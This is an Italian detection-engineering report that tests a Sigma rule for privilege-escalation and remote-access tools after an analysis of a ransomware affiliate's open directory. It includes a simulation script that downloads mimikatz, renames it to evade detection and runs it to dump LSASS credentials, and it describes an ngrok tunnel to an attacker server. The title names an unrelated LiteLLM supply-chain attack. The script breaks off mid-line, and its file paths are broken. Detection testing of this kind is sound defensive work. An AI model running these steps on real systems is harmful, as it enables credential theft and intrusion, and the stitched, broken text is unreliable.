33K Implementazioni LiteLLM Esposte e i Server C2 Dietro l’Attacco alla Catena di Fornitura di TeamPCP

Riassunto

I ricercatori hanno scoperto una directory aperta senza autenticazione su un provider di hosting bulletproof russo contenente un toolkit completo di un operatore ransomware attribuito a un affiliato di TheGentlemen ransomware. Il toolkit include utility legittime, strumenti offensivi ben noti, script batch per l’elusione della difesa, dump delle credenziali e accesso remoto, oltre a token ngrok in testo chiaro. Prove come i log di Mimikatz confermano l’uso attivo contro vittime reali.

Indagine

L’indagine è iniziata interrogando precedenti Indicatori di Compromissione (IOC), portando alla directory aperta a 176.120.22.127:80. Gli analisti hanno catalogato 126 file, estratto strumenti di scansione di rete, utility per l’escalation dei privilegi, script per disabilitare difensori, log di dumping delle credenziali e meccanismi di persistenza. L’analisi dettagliata ha mappato ogni componente alle tecniche MITRE ATT&CK e ha evidenziato l’approccio di elusione della difesa a strati.

Mitigazione

I difensori dovrebbero monitorare l’esecuzione di strumenti dual-use noti, le modifiche al registro che disabilitano Windows Defender, la terminazione di massa dei servizi, l’eliminazione delle ombre VSS e la creazione di condivisioni SMB aperte. Bloccare le connessioni in uscita all’IP identificato e all’infrastruttura ngrok, e applicare l’elenco bianco delle applicazioni e guardia delle credenziali può ridurre l’impatto.

Risposta

Alla rilevazione, isolare l’host interessato, raccogliere dati volatili e identificare eventuali tunnel ngrok attivi utilizzando i token esposti. Ripristinare le modifiche al registro, ripristinare i servizi disabilitati e avviare procedure complete di risposta agli incidenti, inclusa la rotazione delle credenziali e il ripristino dei backup.

## Sintesi Esecutiva

• ID Caso di Test: TC-20260330-A1B2C
• TTP: T1003.001, T1016, T1021.001, T1021.002, T1046, T1057, T1059.003, T1070.001, T1070.004, T1082, T1112, T1134, T1219, T1484.001, T1489, T1490, T1546.008, T1548.002, T1560.001, T1562.001, T1572
• Riepilogo della Logica della Regola di Rilevazione: Rileva la creazione di processi il cui nome eseguibile termina con uno qualsiasi di un elenco curato di strumenti noti di escalation dei privilegi o accesso remoto (es. PowerRun, ngrok, RDP, RustDesk, mimikatz).
• Formato/Linguaggio della Regola di Rilevazione: Sigma (YAML)
• Ambiente di Sicurezza Target: Windows OS; telemetria di creazione dei processi via Sysmon (ID Evento 1) e Log di Sicurezza di Windows (Evento 4688); qualsiasi SIEM/EDR capace di ingoiare questi eventi (es. Azure Sentinel, Splunk, Elastic).
• Punteggio di Resilienza (1-5): 2
• Giustificazione: La regola si basa esclusivamente sulla corrispondenza esatta del nome del file. Un avversario può facilmente eluderla rinominando binari, usando varianti confezionate, o eseguendo la stessa funzionalità tramite utility integrate di Windows, riducendone l’efficacia.
• Risultati Chiave: La regola si attiva in modo affidabile quando vengono eseguiti esattamente i binari elencati, ma non riesce a rilevare strumenti rinominati o funzionalmente equivalenti, portando ad un alto rischio di falsi negativi.
• Raccomandazione: Arricchire la regola con indicatori aggiuntivi (hash, argomenti da linea di comando, relazioni tra processi genitori) e ampliare la copertura per includere binari living-off-the-land che forniscono capacità equivalenti.

## Ambiente di Simulazione e Contesto

• TTP in Test:

  • T1003.001: Dumping delle Credenziali OS – Memoria LSASS
  • T1016: Scoperta della Configurazione di Rete del Sistema
  • T1021.001: Servizi Remoti – Protocollo Desktop Remoto (RDP)
  • T1021.002: Servizi Remoti – Condivisioni Admin SMB/Windows
  • T1046: Scansione del Servizio di Rete
  • T1057: Scoperta dei Processi
  • T1059.003: Interprete di Comandi e Script – Shell dei Comandi di Windows
  • T1070.001: Rimozione di Indicatori sull’Host – Cancellare i Log degli Eventi di Windows
  • T1070.004: Rimozione di Indicatori sull’Host – Eliminazione File
  • T1082: Scoperta delle Informazioni di Sistema
  • T1112: Modificare il Registro
  • T1134: Manipolazione del Token di Accesso
  • T1219: Strumenti di Accesso Remoto
  • T1484.001: Modifica della Politica di Dominio – Modifica delle Politiche di Gruppo
  • T1489: Arresto del Servizio
  • T1490: Inibire il Recupero del Sistema
  • T1546.008: Esecuzione Attivata da Evento – PowerShell
  • T1548.002: Abuso del Meccanismo di Controllo dell’Elevazione – Bypass UAC
  • T1560.001: Archiviazione dei Dati Raccolti – Archiviazione via Utility
  • T1562.001: Compromissione della Difesa – Disabilitazione degli Strumenti di Sicurezza
  • T1572: Tunneling del Protocollo

• Contesto e Rilevanza del TTP:
  La regola mira all’esecuzione di binari storicamente associati alle tecniche elencate (es. mimikatz per T1003.001, ngrok per T1572, RustDesk per T1219). Riproducendo queste esecuzioni, possiamo convalidare se la rilevazione si attiva come previsto e valutare come il rinominare o strumenti alternativi influenzano la rilevazione.

• Ambiente Target:

  • OS: Windows 10/Server 2019 (64-bit)
  • Registrazione: Sysmon (v13+) con configurazione di creazione dei processi predefinita; Log degli eventi di sicurezza di Windows (Evento 4688) abilitato.
  • Stack di Sicurezza: Azure Sentinel (Kusto Query Language) – intercambiabile con Splunk, Elastic, ecc.

## Telemetria e Verifica Prevolo di Base

Ragionamento: Prima di simulare l’attacco, dobbiamo confermare che l’host target è configurato per generare i log necessari, che questi log sono inghiottiti dal SIEM e che la regola di rilevazione non si attiva su attività benigne. Senza questa validazione, qualsiasi risultato del test è inaffidabile.

• 1. Istruzioni di Configurazione della Telemetria:

  1. Installare Sysmon (se non già presente) e applicare una configurazione che registra gli eventi di Creazione di Processi (EventID 1).

     # Scarica e installa Sysmon
     Invoke-WebRequest -Uri https://download.sysinternals.com/files/Sysmon.exe -OutFile $env:TEMPsysmon.exe
     & $env:TEMPsysmon.exe -i -accepteula

  2. Verificare che l’Auditing di Sicurezza di Windows per “Audit Process Creation” (Evento 4688) sia abilitato tramite Criteri di Gruppo o Criterio di Sicurezza Locale.
  3. Assicurarsi che il connettore del SIEM sia attivo e che inoltri sia i log Sysmon che quelli di Sicurezza al workspace scelto.

• 2. Validazione di Ingestione & Baseline:

  • Azione (Telemetria Benigna): Esegui un binario comune di Windows che è not parte dell’elenco di rilevamento ma genera comunque un evento di creazione del processo.

    # Comando benigno – avvia Notepad (non dovrebbe attivare la regola)
    Start-Process notepad.exe

  • Query di Validazione (Ingestione): Conferma l’apparizione dell’evento Notepad nel SIEM.

    // Azure Sentinel KQL – verifica l'ingestione del processo benigno
    SecurityEvent
    | where EventID == 4688
    | where Process == "notepad.exe"
    | project TimeGenerated, Computer, Process, CommandLine, InitiatingProcessFileName
    | limit 10

## Esecuzione della Simulazione

Prerequisito: Deve essere superato il controllo prevolo della telemetria e della baseline.

Ragionamento: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevazione. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevazione. Esempi astratti o non correlati porteranno a misdiagnosi.

• Narrativa dell’Attacco & Comandi:

  1. Dumping delle Credenziali (T1003.001): L’attaccante copia mimikatz.exe sull’host della vittima, lo rinomina in PowerRun_x64.exe (per corrispondere alla lista dei nomi delle regole) e lo esegue per estrarre le credenziali LSASS.
  2. Creazione Tunnel Inverso (T1572): L’attaccante avvia ngrok.exe (come tale) per aprire un tunnel TCP che inoltra una porta RDP locale al server dell’attaccante, facilitando il movimento laterale.
  3. Sessione Desktop Remoto (T1021.001): Usando il nuovo tunnel creato, l’attaccante esegue rdp.exe per aprire una connessione desktop remoto a un secondo host interno.
  4. Accesso Remoto Alternativo (T1219): Come soluzione alternativa, rustdesk.exe viene avviato per stabilire un canale di accesso remoto persistente.

  Ognuna di queste esecuzioni produce un record Sysmon/Event 4688 con il campo Image che termina con il rispettivo nome eseguibile, soddisfacendo la condizione di rilevazione.

• Script Test di Regressione:

  <#
  Script di simulazione per attivare la regola "Strumenti Conosciuti per l'Escalation dei Privilegi e Accesso Remoto".
  Prerequisiti:
    - Sysmon & Auditing degli Eventi di Sicurezza abilitati.
    - L'utente corrente ha diritti sufficienti per eseguire i binari.
  #>
  
  # 1. Distribuisci mimikatz e rinomina in PowerRun_x64.exe (corrisponde alla regola)
  $mimikatzUrl = "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0/mimikatz_trunk.zip"
  $tempPath = "$env:TEMPmimikatz"
  New-Item -ItemType Directory -Path $tempPath -Force | Out-Null
  Invoke-WebRequest -Uri $mimikatzUrl -OutFile "$tempPathmimikatz.zip"
  Expand-Archive -Path "$tempPathmimikatz.zip" -DestinationPath $tempPath -Force
  Copy-Item -Path "$tempPathmimikatzx64mimikatz.exe" -Destination "$env:TEMPPowerRun_x64.exe" -Force
  
  # Esegui mimikatz rinominato (cred

• Cleanup Commands:

  # Terminate ngrok tunnel
  Get-Process -Name ngrok -ErrorAction SilentlyContinue | Stop-Process -Force
  
  # Remove temporary files and binaries
  Remove-Item -Path "$env:TEMPPowerRun_x64.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMPngrok.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMPrdp.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMPrustdesk.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Recurse -Force -Path "$env:TEMPmimikatz", "$env:TEMPngrok", "$env:TEMPrustdesk"
  Write-Host "[*] Cleanup completed."